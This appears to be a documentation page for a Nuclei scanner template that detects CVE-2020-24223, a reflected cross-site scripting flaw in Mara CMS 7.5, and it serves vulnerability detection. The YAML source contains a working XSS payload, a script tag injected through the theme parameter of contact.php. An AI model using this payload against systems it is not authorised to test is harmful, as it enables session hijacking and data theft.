Mara CMS 7.5 - Cross-Site Scripting
ID: CVE-2020-24223
Severity: medium
Author: pikpikcu
Tags: cve2020,cve,mara,xss,edb,mara_cms_project
Description
Section titled “Description”Mara CMS 7.5 allows reflected cross-site scripting in contact.php via the theme or pagetheme parameters.
YAML Source
Section titled “YAML Source”id: CVE-2020-24223
info: name: Mara CMS 7.5 - Cross-Site Scripting author: pikpikcu severity: medium description: Mara CMS 7.5 allows reflected cross-site scripting in contact.php via the theme or pagetheme parameters. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of Mara CMS or apply the vendor-provided patch to fix the XSS vulnerability. reference: - https://www.exploit-db.com/exploits/48777 - https://sourceforge.net/projects/maracms/ - https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download - https://nvd.nist.gov/vuln/detail/CVE-2020-24223 - https://github.com/Elsfa7-110/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-24223 cwe-id: CWE-79 epss-score: 0.0069 epss-percentile: 0.79693 cpe: cpe:2.3:a:mara_cms_project:mara_cms:7.5:*:*:*:*:*:*:* metadata: max-request: 1 vendor: mara_cms_project product: mara_cms tags: cve2020,cve,mara,xss,edb,mara_cms_project
http: - method: GET path: - '{{BaseURL}}/contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'
matchers-condition: and matchers: - type: word part: body words: - '"><script>alert(document.domain)</script>'
- type: word part: header words: - "text/html"
- type: status status: - 200# digest: 4a0a00473045022009db9fd8aaef018efe8b812b31a53e698ffc7b055e2c80bedb66c99a58a6af6a022100deeeebac5c4d5cde202dfda0ff23d8c9aea3d128e73b13369cc64cbbb8fccde0:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-24223.yaml"